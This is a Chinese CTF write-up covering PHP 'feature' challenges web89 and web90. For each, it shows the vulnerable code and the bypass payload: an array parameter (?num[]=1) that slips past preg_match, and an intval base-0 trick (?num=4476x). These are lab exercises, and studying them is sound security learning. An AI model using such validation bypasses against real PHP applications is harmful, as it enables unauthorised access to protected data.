【從0開始學web】89-150 php特性
前言
php代碼審計一直很薄弱,希望完成這部分之后能有所提升,
web89
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-18 15:38:51
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
$num = $_GET['num'];
if(preg_match("/[0-9]/", $num)){
die("no no no!");
}
if(intval($num)){
echo $flag;
}
}
關鍵代碼
if(intval($num)){
echo $flag;
intval() 函式用于獲取變數的整數值,需要拿到一個數字,但是又不被過濾掉,利用陣列過濾
陣列繞過,payload:?num[]=1
web90
include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
$num = $_GET['num'];
if($num==="4476"){
die("no no no!");
}
if(intval($num,0)===4476){
echo $flag;
}else{
echo intval($num,0);
}
}
payload: ?num=4476x
持續更新
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/330101.html
標籤:其他
上一篇:《精通腳本黑客》讀本書吧
下一篇:滲透靶機(CMS漏洞)